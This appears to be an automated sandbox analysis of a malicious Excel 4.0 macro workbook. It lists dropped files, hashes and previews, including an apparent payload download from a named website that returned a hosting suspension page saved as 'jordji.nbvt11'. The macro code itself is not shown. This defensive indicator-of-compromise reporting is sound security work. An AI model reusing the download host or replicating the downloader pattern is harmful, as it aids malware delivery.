                                                                                                                                                                                                                            SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                                                                            MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                                                                            SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                                                                            SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                                                                            SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F3F7F196.png
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                                                                            Entropy (8bit):7.595467031611744
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                                                                            MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                                                                            SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                                                                            SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                                                                            SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\suspendedpage[1].htm
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):494
                                                                                                                                                                                                                            Entropy (8bit):4.962239405540505
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                                            MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                                            SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                                            SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                                            SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                                                            Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7EB40000
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):107618
                                                                                                                                                                                                                            Entropy (8bit):7.916023138059799
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfOf7:nl+yo9opH8x+3xs6ZQc
                                                                                                                                                                                                                            MD5:CEA7FB22B7AEEA0CA1B94AEB059F46AC
                                                                                                                                                                                                                            SHA1:FA2C610AB96876DEB74F5B373653E04470A68884
                                                                                                                                                                                                                            SHA-256:5567F7693EC5E46A015A0FBF26F0E0FDE852344677278F9269883D3B51CE1F5E
                                                                                                                                                                                                                            SHA-512:E52024EB4562A49476FFAACC94005D907A273391AE4CCA3C350F748F3B313C31F7773DAFA4C4A3C1A753EABC151BEC4F3FF9C46ED38FE2E1F71181ED75BC03DA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue May 4 10:51:42 2021, atime=Tue May 4 10:51:42 2021, length=8192, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):904
                                                                                                                                                                                                                            Entropy (8bit):4.655082200856559
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:8SZuXU2vduCH2KOa2D4zSiuX+WrjAZ/DYbDPSeuSeL44t2Y+xIBjKZm:8w+lia+icAZbcDV7aB6m
                                                                                                                                                                                                                            MD5:8BFFAACFFBFC528948052F64BEE5F95D
                                                                                                                                                                                                                            SHA1:BB737B39FDACC71138600C1DD00C09E79E5537F9
                                                                                                                                                                                                                            SHA-256:5108ABEBD2F2A7E6974AB21CAD1BA1B4A08524A55FA8DF7C665CE6E6A3B08092
                                                                                                                                                                                                                            SHA-512:C188C2B194E36169D5C33AA6CBE48E79896A26F43B82BCB909E134A0695173F48F9494B140E430558CD5B996B5F6D8454D04538AFE1DF40B638AFE765D92D854
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: L..................F.............-..=Be..@..=Be..@... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Ri^....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...Ri^....#J.......................j.o.n.e.s.....~.1......Ru^..Desktop.h.......N...Ru^.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......216041...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                            Entropy (8bit):4.59911576030832
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:oyBVomxWdacEI2OytcEI2mxWdacEI2v:djuaZtZaj
                                                                                                                                                                                                                            MD5:19FC1324EF0021D509D5A8DAF316C4DF
                                                                                                                                                                                                                            SHA1:60FF2DF708BD84B80D40E01FF037C9D61F478E46
                                                                                                                                                                                                                            SHA-256:68782E3476F3DA67AB4D1796164708A27E2CE02134A59429591A41C6C7964DA8
                                                                                                                                                                                                                            SHA-512:1DC19FAC86C265AE967CDEBC8EFA5464794FC8D1246E50652D2A504DB3D419B7F6D1AD701F481B296A0C3D86DC3CF92DF15A73DEF230DCBA7E7D629D45336D11
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: Desktop.LNK=0..[misc]..statistic-2069354685.LNK=0..statistic-2069354685.LNK=0..[misc]..statistic-2069354685.LNK=0..
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2069354685.LNK
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Tue May 4 10:51:42 2021, atime=Tue May 4 10:51:42 2021, length=107618, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2220
                                                                                                                                                                                                                            Entropy (8bit):4.704022266106895
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:8hNHliabW6RPiY6uB6phNHliabW6RPiY6uB6:8hFliay64Y6uKhFliay64Y6u
                                                                                                                                                                                                                            MD5:320A4974EB418DDF4D3592E78DE3A205
                                                                                                                                                                                                                            SHA1:211C8075764DEE2DCF34FC3CAB5A0D534E2CD999
                                                                                                                                                                                                                            SHA-256:933C586DF817A2DF1D4A0A7D083479F0DF68AC2FFFE7C22BC13A407ACB5D0DB0
                                                                                                                                                                                                                            SHA-512:7160A1BD630A8BA89C44B78A732CDF297B88FDA729F8DFAC0CB1511C9A1BBC696FA7D278A8D68417D33237B1117DA37BD0E79FB437E521E6B357E68905027823
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: L..................F.... ....}YS......u..@..Y.s..@..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Ri^....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...Ri^....#J.......................j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...Rj^.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Rp^ .STATIS~1.XLS..d......>Q{<.Rp^.....V....................6..s.t.a.t.i.s.t.i.c.-.2.0.6.9.3.5.4.6.8.5...x.l.s.m......._...............-.......^...........>.S......C:\Users\user\Desktop\statistic-2069354685.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.6.9.3.5.4.6.8.5...x.l.s.m.........:..,.LB.)...As...`.......X.......216041...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):22
                                                                                                                                                                                                                            Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                                            MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                                            SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                                            SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                                            SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                                            C:\Users\user\Desktop\CFB40000
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):107618
                                                                                                                                                                                                                            Entropy (8bit):7.916049268000447
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQf1:nl+yo9opH8x+3xs6ZQt
                                                                                                                                                                                                                            MD5:882095718AF57FA3BAE17A531D90F22F
                                                                                                                                                                                                                            SHA1:7E5863C725008053C77A9BA9C17ECB105C63D1BE
                                                                                                                                                                                                                            SHA-256:F5975244672C7752B568930B74717DB5DC2C12C738CFE3B24B846BB2093F0162
                                                                                                                                                                                                                            SHA-512:8A819EA6B83B8C411E46A49341A3B4AECCDC3EA14DCE8C580CE498E84ED5FC2D10B9BF96206F7704526D90FD2BB605DC2C18319F5F8BD72255D21881C38A4F8A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            C:\Users\user\Desktop\~$statistic-2069354685.xlsm
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):330
                                                                                                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                                                                            MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                                                                            SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                                                                            SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                                                                            SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                            C:\Users\user\jordji.nbvt11
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):494
                                                                                                                                                                                                                            Entropy (8bit):4.962239405540505
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                                            MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                                            SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                                            SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                                            SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:Microsoft Excel 2007+
                                                                                                                                                                                                                            Entropy (8bit):7.917058358399405
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                                            • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                                            File name:statistic-2069354685.xlsm
                                                                                                                                                                                                                            File size:109084
                                                                                                                                                                                                                            MD5:e594ea809c24d81cacae25761ae68a4d
                                                                                                                                                                                                                            SHA1:c402e78a57d801ee6220aa1e8532e444db22f911
                                                                                                                                                                                                                            SHA256:d328633005bb0fd39826107193a26f4d6d933fb4f2dfb6f8e4eb48c6eab81df3
                                                                                                                                                                                                                            SHA512:01e3c852814d23f57b206ff2f6b4f0c0f55cf76ed7bc77483688e2a86d2c4b4112487b1e157b25adf81ac0b64afd1446ae8c720e1c1c39bd9bd8d06dd06fd4e2
                                                                                                                                                                                                                            SSDEEP:1536:cutuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:ckuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                                                                                                                                                                            File Content Preview:PK..........!.t...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:74ecd0e2f696908c

                                                                                                                                                                                                                            Static OLE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Document Type:OpenXML
                                                                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                                                                            OLE File "statistic-2069354685.xlsm"

                                                                                                                                                                                                                            Indicators

                                                                                                                                                                                                                            Has Summary Info:
                                                                                                                                                                                                                            Application Name:
                                                                                                                                                                                                                            Encrypted Document:
                                                                                                                                                                                                                            Contains Word Document Stream:
                                                                                                                                                                                                                            Contains Workbook/Book Stream:
                                                                                                                                                                                                                            Contains PowerPoint Document Stream:
                                                                                                                                                                                                                            Contains Visio Document Stream:
                                                                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                                                                            Contains VBA Macros:

                                                                                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                                                                                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,